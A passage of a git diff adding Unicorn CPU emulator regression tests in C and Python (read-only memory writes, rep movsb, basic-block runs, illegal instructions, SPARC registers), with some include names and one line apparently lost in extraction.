log_num++, addr, size, value); + } +} + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_hook trace1, trace2; + uc_err err; + uint8_t buf1[100], readbuf[100]; + + printf("# rep movsb test\n"); + + memset(buf1, 'A', 20); + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err) { + printf("not ok %d - Failed on uc_open() with error returned: %u\n", log_num++, err); + return 1; + } + else { + printf("ok %d - uc_open() success\n", log_num++); + } + + uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_READ); + uc_mem_map(uc, 0x200000, 0x2000, UC_PROT_READ | UC_PROT_WRITE); + + // fill in the data that we want to copy + if (uc_mem_write(uc, 0x200000, buf1, 20)) { + printf("not ok %d - Failed to write read buffer to memory, quit!\n", log_num++); + return 2; + } + else { + printf("ok %d - Read buffer written to memory\n", log_num++); + } + + // write machine code to be emulated to memory + if (uc_mem_write(uc, 0x100000, PROGRAM, sizeof(PROGRAM))) { + printf("not ok %d - Failed to write emulation code to memory, quit!\n", log_num++); + return 4; + } + else { + printf("ok %d - Program written to memory\n", log_num++); + } + + if (uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0) != UC_ERR_OK) { + printf("not ok %d - Failed to install UC_HOOK_CODE handler\n", log_num++); + return 5; + } + else { + printf("ok %d - UC_HOOK_CODE installed\n", log_num++); + } + + // intercept memory write events only, NOT read events + if (uc_hook_add(uc, &trace1, UC_HOOK_MEM_WRITE, hook_mem_write, NULL, 1, 0) != UC_ERR_OK) { + printf("not ok %d - Failed to install UC_HOOK_MEM_WRITE handler\n", log_num++); + return 6; + } + else { + printf("ok %d - UC_HOOK_MEM_WRITE installed\n", log_num++); + } + + // emulate machine code until told to stop by hook_code + printf("# BEGIN execution\n"); + err = uc_emu_start(uc, 0x100000, 0x101000, 0, 0); + if (err != UC_ERR_OK) { + printf("not ok %d - Failure on uc_emu_start() with error %u:%s\n", log_num++, err, uc_strerror(err)); + return 8; + } + else { + printf("ok %d - uc_emu_start complete\n", log_num++); + } + printf("# END execution\n"); + + //make sure that data got copied + // fill in sections that shouldn't get touched + if (uc_mem_read(uc, 0x201000, readbuf, 20)) { + printf("not ok %d - Failed to read random buffer 1 from memory\n", log_num++); + } + else { + printf("ok %d - Random buffer 1 read from memory\n", log_num++); + if (memcmp(buf1, readbuf, 20)) { + printf("not ok %d - write buffer contents are incorrect\n", log_num++); + } + else { + printf("ok %d - write buffer contents are correct\n", log_num++); + } + } + + if (uc_close(uc) == UC_ERR_OK) { + printf("ok %d - uc_close complete\n", log_num++); + } + else { + printf("not ok %d - uc_close complete\n", log_num++); + } + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/ro_mem_test.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/ro_mem_test.c new file mode 100644 index 0000000..0197877 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/ro_mem_test.c @@ -0,0 +1,209 @@ +/* +Non-writable memory test case + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +#include + +#include + +const uint8_t PROGRAM[] = + "\xeb\x1a\x58\x83\xc0\x04\x83\xe0\xfc\x83\xc0\x01\xc7\x00\x78\x56" + "\x34\x12\x83\xc0\x07\xc7\x00\x21\x43\x65\x87\x90\xe8\xe1\xff\xff" + "\xff" "xxxxAAAAxxxBBBB"; +// total size: 33 bytes + +/* + jmp short bottom +top: + pop eax + add eax, 4 + and eax, 0xfffffffc + add eax, 1 ; unaligned + mov dword [eax], 0x12345678 ; try to write into code section + add eax, 7 ; aligned + mov dword [eax], 0x87654321 ; try to write into code section + nop +bottom: + call top +*/ + +// callback for tracing instruction +/*static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + uint32_t esp; + printf(">>> Tracing instruction at 0x%"PRIx64 ", instruction size = 0x%x\n", address, size); + + uc_reg_read(uc, UC_X86_REG_ESP, &esp); + printf(">>> --- ESP is 0x%x\n", esp); + +} +*/ + +// callback for tracing memory access (READ or WRITE) +static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data) +{ + uint32_t esp; + uc_reg_read(uc, UC_X86_REG_ESP, &esp); + + switch(type) { + default: + // return false to indicate we want to stop emulation + return false; + case UC_MEM_WRITE: + //if this is a push, esp has not been adjusted yet + if (esp == (address + size)) { + uint32_t upper; + upper = (esp + 0xfff) & ~0xfff; + printf(">>> Stack appears to be missing at 0x%"PRIx64 ", allocating now\n", address); + // map this memory in with 2MB in size + uc_mem_map(uc, upper - 0x8000, 0x8000, UC_PROT_READ | UC_PROT_WRITE); + // return true to indicate we want to continue + return true; + } + printf(">>> Missing memory is being WRITTEN at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", + address, size, value); + return false; + case UC_MEM_WRITE_PROT: + printf(">>> RO memory is being WRITTEN at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", + address, size, value); + return false; + } +} + + +#define STACK 0x500000 +#define STACK_SIZE 0x5000 + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_hook trace1; + uc_err err; + uint8_t bytes[8]; + uint32_t esp; + int map_stack = 0; + + if (argc == 2 && strcmp(argv[1], "--map-stack") == 0) { + map_stack = 1; + } + + printf("Memory mapping test\n"); + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err) { + printf("Failed on uc_open() with error returned: %u\n", err); + return 1; + } + + uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_ALL); + uc_mem_map(uc, 0x200000, 0x2000, UC_PROT_ALL); + uc_mem_map(uc, 0x300000, 0x3000, UC_PROT_ALL); + uc_mem_map(uc, 0x400000, 0x4000, UC_PROT_READ); + + if (map_stack) { + printf("Pre-mapping stack\n"); + uc_mem_map(uc, STACK, STACK_SIZE, UC_PROT_READ | UC_PROT_WRITE); + } else { + printf("Mapping stack on first invalid memory access\n"); + } + + esp = STACK + STACK_SIZE; + + uc_reg_write(uc, UC_X86_REG_ESP, &esp); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, 0x400000, PROGRAM, sizeof(PROGRAM))) { + printf("Failed to write emulation code to memory, quit!\n"); + return 2; + } else { + printf("Allowed to write to read only memory via uc_mem_write\n"); + } + + //uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 0x400000, 0x400fff); + + // intercept invalid memory events + uc_hook_add(uc, &trace1, UC_HOOK_MEM_WRITE_UNMAPPED | UC_HOOK_MEM_WRITE_PROT, hook_mem_invalid, NULL, 1, 0); + + // emulate machine code in infinite time + printf("BEGIN execution - 1\n"); + err = uc_emu_start(uc, 0x400000, 0x400000 + sizeof(PROGRAM), 0, 10); + if (err) { + printf("Expected failue on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } else { + printf("UNEXPECTED uc_emu_start returned UC_ERR_OK\n"); + } + printf("END execution - 1\n"); + + // emulate machine code in infinite time + printf("BEGIN execution - 2\n"); + //update eax to point to aligned memory (same as add eax,7 above) + uint32_t eax = 0x40002C; + uc_reg_write(uc, UC_X86_REG_EAX, &eax); + //resume execution at the mov dword [eax], 0x87654321 + //to test an aligned write as well + err = uc_emu_start(uc, 0x400015, 0x400000 + sizeof(PROGRAM), 0, 2); + if (err) { + printf("Expected failure on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } else { + printf("UNEXPECTED uc_emu_start returned UC_ERR_OK\n"); + } + printf("END execution - 2\n"); + + printf("Verifying content at 0x400025 is unchanged\n"); + if (!uc_mem_read(uc, 0x400025, bytes, 4)) { + printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)0x400025, *(uint32_t*) bytes); + if (0x41414141 != *(uint32_t*) bytes) { + printf("ERROR content in read only memory changed\n"); + } else { + printf("SUCCESS content in read only memory unchanged\n"); + } + } else { + printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); + return 4; + } + + printf("Verifying content at 0x40002C is unchanged\n"); + if (!uc_mem_read(uc, 0x40002C, bytes, 4)) { + printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)0x40002C, *(uint32_t*) bytes); + if (0x42424242 != *(uint32_t*) bytes) { + printf("ERROR content in read only memory changed\n"); + } else { + printf("SUCCESS content in read only memory unchanged\n"); + } + } else { + printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); + return 4; + } + + printf("Verifying content at bottom of stack is readable and correct\n"); + if (!uc_mem_read(uc, esp - 4, bytes, 4)) { + printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)(esp - 4), *(uint32_t*) bytes); + } else { + printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); + return 4; + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/run_across_bb.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/run_across_bb.py new file mode 100644 index 0000000..074db4d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/run_across_bb.py @@ -0,0 +1,195 @@ +#!/usr/bin/python +# +# This test demonstrates emulation behavior within and across +# basic blocks. + +from __future__ import print_function +import binascii +import regress +import struct + +from unicorn import * +from unicorn.x86_const import * + + +CODE = binascii.unhexlify(b"".join([ + b"b800000000", # 1000: b8 00 00 00 00 mov eax,0x0 + b"40", # 1005: 40 inc eax + b"40", # 1006: 40 inc eax + b"6810100000", # 1007: 68 10 10 00 00 push 0x1010 + b"c3", # 100c: c3 ret + b"cc", # 100d: cc int3 + b"cc", # 100e: cc int3 + b"cc", # 100f: cc int3 + b"b800000000", # 1010: b8 00 00 00 00 mov eax,0x0 + b"40", # 1015: 40 inc eax + b"40", # 1016: 40 inc eax + ])) + + +def showpc(mu): + pc = mu.reg_read(UC_X86_REG_EIP) + print("pc: 0x%x" % (pc)) + + +class RunAcrossBBTest(regress.RegressTest): + def test_run_all(self): + try: + ####################################################################### + # emu SETUP + ####################################################################### + print("\n---- test: run_all ----") + + + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + mu.hook_add(UC_HOOK_CODE, hook_code) + + # base of CODE + mu.mem_map(0x1000, 0x1000) + mu.mem_write(0x1000, CODE) + + # stack + mu.mem_map(0x2000, 0x1000) + + mu.reg_write(UC_X86_REG_EIP, 0x1000) + mu.reg_write(UC_X86_REG_ESP, 0x2800) + self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_EIP), "unexpected PC") + self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP") + showpc(mu) + + mu.emu_start(0x1000, 0x1016) + # should exec the following four instructions: + # 1000: b8 00 00 00 00 mov eax,0x0 < + # 1005: 40 inc eax < + # 1006: 40 inc eax < + # 1007: 68 10 10 00 00 push 0x1010 < + # 100c: c3 ret -----------+ + # 100d: cc int3 | + # 100e: cc int3 | + # 100f: cc int3 | + # 1010: b8 00 00 00 00 mov eax,0x0 <-+ + # 1015: 40 inc eax < + # 1016: 40 inc eax < + self.assertEqual(0x1016, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (2)") + self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP (2)") + showpc(mu) + + except UcError as e: + if e.errno == UC_ERR_FETCH_UNMAPPED: + # during initial test dev, bad fetch at 0x1010, but the data is there, + # and this proves it + print("!!! about to bail due to bad fetch... here's the data at PC:") + print(binascii.hexlify(mu.mem_read(mu.reg_read(UC_X86_REG_EIP), 0x8))) + + self.assertFalse(True, "ERROR: %s @ 0x%x" % (e, mu.reg_read(UC_X86_REG_EIP))) + + + + def test_run_across_bb(self): + try: + ####################################################################### + # emu SETUP + ####################################################################### + print("\n---- test: run_across_bb ----") + + + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + mu.hook_add(UC_HOOK_CODE, hook_code) + + # base of CODE + mu.mem_map(0x1000, 0x1000) + mu.mem_write(0x1000, CODE) + + # stack + mu.mem_map(0x2000, 0x1000) + + mu.reg_write(UC_X86_REG_EIP, 0x1000) + mu.reg_write(UC_X86_REG_ESP, 0x2800) + self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_EIP), "unexpected PC") + self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP") + showpc(mu) + + + ####################################################################### + # emu_run ONE: + # exectue four instructions, until the last instruction in a BB + ####################################################################### + + + mu.emu_start(0x1000, 0x100c) + # should exec the following four instructions: + # 1000: b8 00 00 00 00 mov eax,0x0 < + # 1005: 40 inc eax < + # 1006: 40 inc eax < + # 1007: 68 10 10 00 00 push 0x1010 < + + # should be at 0x100c, as requested + self.assertEqual(0x100c, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (2)") + + # single push, so stack diff is 0x4 + TOP_OF_STACK = 0x2800-0x4 + self.assertEqual(TOP_OF_STACK, mu.reg_read(UC_X86_REG_ESP), "unexpected SP (2)") + + # top of stack should be 0x1010 + self.assertEqual(0x1010, + struct.unpack(" +#include +#include + +#define ADDRESS 0x1000000 +#define STACK 0x0020D000 +#define STACK2 0x0030D000 +#define STACK_SIZE 16384 +#define SIZE (2 * 1024 * 1024) +#define CODE32 "\x8B\x04\x24\xA3\x40\x00\x00\x01\xA1\x40\x00\x00\x01" + +bool hook_mem_rw(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) +{ + unsigned int EIP; + + uc_reg_read(uc, UC_X86_REG_EIP, &EIP); + switch(type) + { + default: + return false; + break; + case UC_MEM_WRITE: + printf("Hooked write to address 0x%08"PRIX64" with value 0x%08"PRIX64" at EIP %08X\n", address, value, EIP); + + return true; + break; + case UC_MEM_READ: + printf("Hooked read from address 0x%08"PRIX64" with value 0x%08"PRIX64" at EIP %08X\n", address, value, EIP); + + return true; + break; + } +} + +int main(int argc, char *argv[]) +{ + uc_engine *uc; + uc_hook trace; + uc_err err; + unsigned int EAX, ESP, val = 0x0c0c0c0c, stkval = STACK; + + EAX = 0; + ESP = STACK+0x4; + + // Initialize emulator in X86-64bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if(err) { + printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); + return 1; + } + + err = uc_mem_map(uc, ADDRESS, SIZE, UC_PROT_ALL); + if(err != UC_ERR_OK) { + printf("Failed to map memory %s\n", uc_strerror(err)); + return 1; + } + + err = uc_mem_write(uc, ADDRESS, CODE32, sizeof(CODE32) - 1); + if(err != UC_ERR_OK) { + printf("Failed to write to memory %s\n", uc_strerror(err)); + return 1; + } + +loop: + err = uc_mem_map(uc, stkval, STACK_SIZE, UC_PROT_ALL); + if(err != UC_ERR_OK) { + printf("Failed to map memory %s\n", uc_strerror(err)); + return 1; + } + + err = uc_mem_write(uc, ESP, &val, sizeof(val)); + if(err != UC_ERR_OK) { + printf("Failed to write to memory %s\n", uc_strerror(err)); + return 1; + } + + + uc_hook_add(uc, &trace, UC_HOOK_MEM_WRITE | UC_HOOK_MEM_READ, (void *)hook_mem_rw, NULL, 1, 0); + + uc_reg_write(uc, UC_X86_REG_EAX, &EAX); + uc_reg_write(uc, UC_X86_REG_ESP, &ESP); + + err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(CODE32) - 1), 0, 0); + if(err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + + uc_close(uc); + return 1; + } + + uc_reg_read(uc, UC_X86_REG_EAX, &EAX); + + printf(">>> EAX = %08X\n", EAX); + + if(stkval != STACK2) + { + printf("=== Beginning test two ===\n"); + ESP = STACK2+0x4; + EAX = 0; + stkval = STACK2; + goto loop; + } + + uc_close(uc); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/segfault_on_stop.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/segfault_on_stop.py new file mode 100644 index 0000000..8d57710 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/segfault_on_stop.py @@ -0,0 +1,13 @@ +#!/usr/bin/env python + +import regress +import unicorn + + +class SegfaultOnStop(regress.RegressTest): + def test(self): + unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_64).emu_stop() + self.assertTrue(True, "If not reached, then we have a crashing bug.") + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill.c new file mode 100644 index 0000000..9e5061d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill.c @@ -0,0 +1,47 @@ +#include +#include +#include +#include + +#define UC_BUG_WRITE_SIZE 128 +#define UC_BUG_WRITE_ADDR 0x1000 // fix this by change this to 0x2000 + +int got_sigill = 0; + +void _interrupt(uc_engine *uc, uint32_t intno, void *user_data) +{ + if (intno == 6) { + uc_emu_stop(uc); + got_sigill = 1; + } +} + +int main() +{ + int size; + uint8_t *buf; + uc_engine *uc; + uc_hook uh_trap; + uc_err err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); + if (err) { + fprintf (stderr, "Cannot initialize unicorn\n"); + return 1; + } + size = UC_BUG_WRITE_SIZE; + buf = malloc (size); + if (!buf) { + fprintf (stderr, "Cannot allocate\n"); + return 1; + } + memset (buf, 0, size); + if (!uc_mem_map(uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) { + uc_mem_write(uc, UC_BUG_WRITE_ADDR, + (const uint8_t*)"\xff\xff\xff\xff\xff\xff\xff\xff", 8); + } + uc_hook_add(uc, &uh_trap, UC_HOOK_INTR, _interrupt, NULL, 1, 0); + uc_emu_start(uc, UC_BUG_WRITE_ADDR, UC_BUG_WRITE_ADDR+8, 0, 1); + uc_close(uc); + free(buf); + printf ("Correct: %s\n", got_sigill? "YES": "NO"); + return got_sigill? 0: 1; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill2.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill2.c new file mode 100644 index 0000000..8e6ad56 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill2.c @@ -0,0 +1,28 @@ +#include +#include +#include +#include + +#define UC_BUG_WRITE_SIZE 128 +#define UC_BUG_WRITE_ADDR 0x2000 + +int main() +{ + int size; + uc_engine *uc; + + uc_err err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); + if (err) { + fprintf (stderr, "Cannot initialize unicorn\n"); + return 1; + } + size = UC_BUG_WRITE_SIZE; + if (!uc_mem_map (uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) { + uc_mem_write (uc, UC_BUG_WRITE_ADDR, + (const uint8_t*)"\xff\xff\xff\xff\xff\xff\xff\xff", 8); + } + err = uc_emu_start(uc, UC_BUG_WRITE_ADDR, UC_BUG_WRITE_ADDR+8, 0, 1); + uc_close(uc); + printf ("Error = %u (%s)\n", err, uc_strerror(err)); + return err? -1: 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc64.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc64.py new file mode 100644 index 0000000..3430763 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc64.py @@ -0,0 +1,24 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.sparc_const import * + +PAGE_SIZE = 1 * 1024 * 1024 + +uc = Uc(UC_ARCH_SPARC, UC_MODE_SPARC64|UC_MODE_BIG_ENDIAN) +uc.reg_write(UC_SPARC_REG_SP, 100) +print 'writing sp = 100' + + # 0: b0 06 20 01 inc %i0 + # 4: b2 06 60 01 inc %i1 + +CODE = "\xb0\x06\x20\x01" \ + "\xb2\x06\x60\x01" + +uc.mem_map(0, PAGE_SIZE) +uc.mem_write(0, CODE) +uc.emu_start(0, len(CODE), 0, 2) + +print 'sp =', uc.reg_read(UC_SPARC_REG_SP) +print 'i0 =', uc.reg_read(UC_SPARC_REG_I0) +print 'i1 =', uc.reg_read(UC_SPARC_REG_I1) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_jump_to_zero.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_jump_to_zero.c new file mode 100644 index 0000000..538405f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_jump_to_zero.c @@ -0,0 +1,27 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_SPARC +#define HARDWARE_MODE UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN + +#define MEMORY_STARTING_ADDRESS 0x1000000 +#define MEMORY_SIZE 2 * 1024 * 1024 +#define MEMORY_PERMISSIONS UC_PROT_ALL + +#define BINARY_CODE "\x02\xbc\x00\x00" + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 20); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_reg.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_reg.py new file mode 100644 index 0000000..3d55065 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_reg.py @@ -0,0 +1,205 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.sparc_const import * + +PAGE_SIZE = 1 * 1024 * 1024 + +uc = Uc(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN) +uc.reg_write(UC_SPARC_REG_SP, 100) +uc.reg_write(UC_SPARC_REG_FP, 200) + + # 0x0: \x80\x00\x20\x01 add %g0, 1, %g0 + # 0x4: \x82\x00\x60\x01 add %g1, 1, %g1 + # 0x8: \x84\x00\xA0\x01 add %g2, 1, %g2 + # 0xc: \x86\x00\xE0\x01 add %g3, 1, %g3 + # 0x10: \x88\x01\x20\x01 add %g4, 1, %g4 + # 0x14: \x8A\x01\x60\x01 add %g5, 1, %g5 + # 0x18: \x8C\x01\xA0\x01 add %g6, 1, %g6 + # 0x1c: \x8E\x01\xE0\x01 add %g7, 1, %g7 + # 0x20: \x90\x02\x20\x01 add %o0, 1, %o0 + # 0x24: \x92\x02\x60\x01 add %o1, 1, %o1 + # 0x28: \x94\x02\xA0\x01 add %o2, 1, %o2 + # 0x2c: \x96\x02\xE0\x01 add %o3, 1, %o3 + # 0x30: \x98\x03\x20\x01 add %o4, 1, %o4 + # 0x34: \x9A\x03\x60\x01 add %o5, 1, %o5 + # 0x38: \x9C\x03\xA0\x01 add %sp, 1, %sp + # 0x3c: \x9E\x03\xE0\x01 add %o7, 1, %o7 + # 0x40: \xA0\x04\x20\x01 add %l0, 1, %l0 + # 0x44: \xA2\x04\x60\x01 add %l1, 1, %l1 + # 0x48: \xA4\x04\xA0\x01 add %l2, 1, %l2 + # 0x4c: \xA6\x04\xE0\x01 add %l3, 1, %l3 + # 0x50: \xA8\x05\x20\x01 add %l4, 1, %l4 + # 0x54: \xAA\x05\x60\x01 add %l5, 1, %l5 + # 0x58: \xAC\x05\xA0\x01 add %l6, 1, %l6 + # 0x5c: \xAE\x05\xE0\x01 add %l7, 1, %l7 + # 0x0: \xB0\x06\x20\x01 add %i0, 1, %i0 + # 0x4: \xB2\x06\x60\x01 add %i1, 1, %i1 + # 0x8: \xB4\x06\xA0\x01 add %i2, 1, %i2 + # 0xc: \xB6\x06\xE0\x01 add %i3, 1, %i3 + # 0x10: \xB8\x07\x20\x01 add %i4, 1, %i4 + # 0x14: \xBA\x07\x60\x01 add %i5, 1, %i5 + # 0x18: \xBC\x07\xA0\x01 add %fp, 1, %fp + # 0x1c: \xBE\x07\xE0\x01 add %i7, 1, %i7 + + +CODE = "\x80\x00\x20\x01" \ + "\x82\x00\x60\x01" \ + "\x84\x00\xA0\x01" \ + "\x86\x00\xE0\x01" \ + "\x88\x01\x20\x01" \ + "\x8A\x01\x60\x01" \ + "\x8C\x01\xA0\x01" \ + "\x8E\x01\xE0\x01" \ + "\x90\x02\x20\x01" \ + "\x92\x02\x60\x01" \ + "\x94\x02\xA0\x01" \ + "\x96\x02\xE0\x01" \ + "\x98\x03\x20\x01" \ + "\x9A\x03\x60\x01" \ + "\x9C\x03\xA0\x01" \ + "\x9E\x03\xE0\x01" \ + "\xA0\x04\x20\x01" \ + "\xA2\x04\x60\x01" \ + "\xA4\x04\xA0\x01" \ + "\xA6\x04\xE0\x01" \ + "\xA8\x05\x20\x01" \ + "\xAA\x05\x60\x01" \ + "\xAC\x05\xA0\x01" \ + "\xAE\x05\xE0\x01" \ + "\xB0\x06\x20\x01" \ + "\xB2\x06\x60\x01" \ + "\xB4\x06\xA0\x01" \ + "\xB6\x06\xE0\x01" \ + "\xB8\x07\x20\x01" \ + "\xBA\x07\x60\x01" \ + "\xBC\x07\xA0\x01" \ + "\xBE\x07\xE0\x01" + + +uc.mem_map(0, PAGE_SIZE) +uc.mem_write(0, CODE) +uc.emu_start(0, len(CODE), 0, 32) + +def print_registers(mu): + g0 = mu.reg_read(UC_SPARC_REG_G0) + g1 = mu.reg_read(UC_SPARC_REG_G1) + g2 = mu.reg_read(UC_SPARC_REG_G2) + g3 = mu.reg_read(UC_SPARC_REG_G3) + g4 = mu.reg_read(UC_SPARC_REG_G4) + g5 = mu.reg_read(UC_SPARC_REG_G5) + g6 = mu.reg_read(UC_SPARC_REG_G6) + g7 = mu.reg_read(UC_SPARC_REG_G7) + + o0 = mu.reg_read(UC_SPARC_REG_O0) + o1 = mu.reg_read(UC_SPARC_REG_O1) + o2 = mu.reg_read(UC_SPARC_REG_O2) + o3 = mu.reg_read(UC_SPARC_REG_O3) + o4 = mu.reg_read(UC_SPARC_REG_O4) + o5 = mu.reg_read(UC_SPARC_REG_O5) + o6 = mu.reg_read(UC_SPARC_REG_O6) + o7 = mu.reg_read(UC_SPARC_REG_O7) + + l0 = mu.reg_read(UC_SPARC_REG_L0) + l1 = mu.reg_read(UC_SPARC_REG_L1) + l2 = mu.reg_read(UC_SPARC_REG_L2) + l3 = mu.reg_read(UC_SPARC_REG_L3) + l4 = mu.reg_read(UC_SPARC_REG_L4) + l5 = mu.reg_read(UC_SPARC_REG_L5) + l6 = mu.reg_read(UC_SPARC_REG_L6) + l7 = mu.reg_read(UC_SPARC_REG_L7) + + i0 = mu.reg_read(UC_SPARC_REG_I0) + i1 = mu.reg_read(UC_SPARC_REG_I1) + i2 = mu.reg_read(UC_SPARC_REG_I2) + i3 = mu.reg_read(UC_SPARC_REG_I3) + i4 = mu.reg_read(UC_SPARC_REG_I4) + i5 = mu.reg_read(UC_SPARC_REG_I5) + i6 = mu.reg_read(UC_SPARC_REG_I6) + i7 = mu.reg_read(UC_SPARC_REG_I7) + + pc = mu.reg_read(UC_SPARC_REG_PC) + sp = mu.reg_read(UC_SPARC_REG_SP) + fp = mu.reg_read(UC_SPARC_REG_FP) + print(" G0 = %d" % g0) + print(" G1 = %d" % g1) + print(" G2 = %d" % g2) + print(" G3 = %d" % g3) + print(" G4 = %d" % g4) + print(" G5 = %d" % g5) + print(" G6 = %d" % g6) + print(" G7 = %d" % g7) + print("") + print(" O0 = %d" % o0) + print(" O1 = %d" % o1) + print(" O2 = %d" % o2) + print(" O3 = %d" % o3) + print(" O4 = %d" % o4) + print(" O5 = %d" % o5) + print(" O6 = %d" % o6) + print(" O7 = %d" % o7) + print("") + print(" L0 = %d" % l0) + print(" L1 = %d" % l1) + print(" L2 = %d" % l2) + print(" L3 = %d" % l3) + print(" L4 = %d" % l4) + print(" L5 = %d" % l5) + print(" L6 = %d" % l6) + print(" L7 = %d" % l7) + print("") + print(" I0 = %d" % i0) + print(" I1 = %d" % i1) + print(" I2 = %d" % i2) + print(" I3 = %d" % i3) + print(" I4 = %d" % i4) + print(" I5 = %d" % i5) + print(" I6 = %d" % i6) + print(" I7 = %d" % i7) + print("") + print(" PC = %d" % pc) + print(" SP = %d" % sp) + print(" FP = %d" % fp) + print("") + +print_registers(uc) + +assert uc.reg_read(UC_SPARC_REG_PC) == 132 # make sure we executed all instructions +assert uc.reg_read(UC_SPARC_REG_SP) == 101 +assert uc.reg_read(UC_SPARC_REG_FP) == 201 + +assert uc.reg_read(UC_SPARC_REG_G0) == 0 # G0 is always zero +assert uc.reg_read(UC_SPARC_REG_G1) == 1 +assert uc.reg_read(UC_SPARC_REG_G2) == 1 +assert uc.reg_read(UC_SPARC_REG_G3) == 1 +assert uc.reg_read(UC_SPARC_REG_G4) == 1 +assert 